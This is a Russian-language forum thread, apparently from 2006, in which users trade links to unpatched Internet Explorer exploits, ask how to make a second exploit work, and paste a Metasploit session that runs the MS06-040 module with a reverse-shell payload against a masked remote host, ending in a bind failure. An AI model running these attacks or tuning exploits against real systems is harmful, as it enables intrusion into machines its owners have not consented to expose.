Нашел новые сплойты на MS IE, на которые еще нет заплатки. Работает на ура вот это, калькулятор запускает. На Win2000 IE вырубается, но калькулятора не дает: Code: http://milw0rm.org/exploits/2425 Это компилится, но мою винду не цепляет, хотя на ту же дыру Code: http://milw0rm.org/exploits/2403 как подправить второй сплойт так, что бы он работал на ура как и первый? Мерси всем, кто раздуплит.
http://milw0rm.org/exploits/2425 - тестанул вот этот, осел вылетел и запустилось 2 (два) калькулятора (XP SP2)
Затестил сплоит от jamikazu - работает на SP2+IE Провериться на запуск калькулятора можно Тут А от метасплоита что-то не пашет (удалённый) msf > cd framework msfconsole: chdir: changed to directory framework msf > use netapi_ms06_040 msf netapi_ms06_040 > set RHOST хх.хх.хх.2 RHOST -> хх.хх.хх.2 msf netapi_ms06_040 > set PAYLOAD win32_reverse PAYLOAD -> win32_reverse msf netapi_ms06_040(win32_reverse) > set LHOST хх.хх.хх.1 LHOST -> хх.хх.хх.1 msf netapi_ms06_040(win32_reverse) > exploit [*] Starting Reverse Handler. [*] WARNING: Failed to create pipe to \BROWSER: Create returned NT status 0xc0000034 at /home/framework/lib/Pex/DCERPC.pm line 869. [*] Could not bind to 4b324fc8-1670-01d3-1278-5a47bf6ee188:3.0@ncacn_np:хх.хх.хх.2[\BROWSER] [*] Exiting Reverse Handler. msf netapi_ms06_040(win32_reverse) > Что то не так в либе DCERPC.pm ? (или она старой версии?)
Сегдня вышел UPDATE заплатки на VML http://www.microsoft.com/athome/security/update/bulletins/200609.mspx
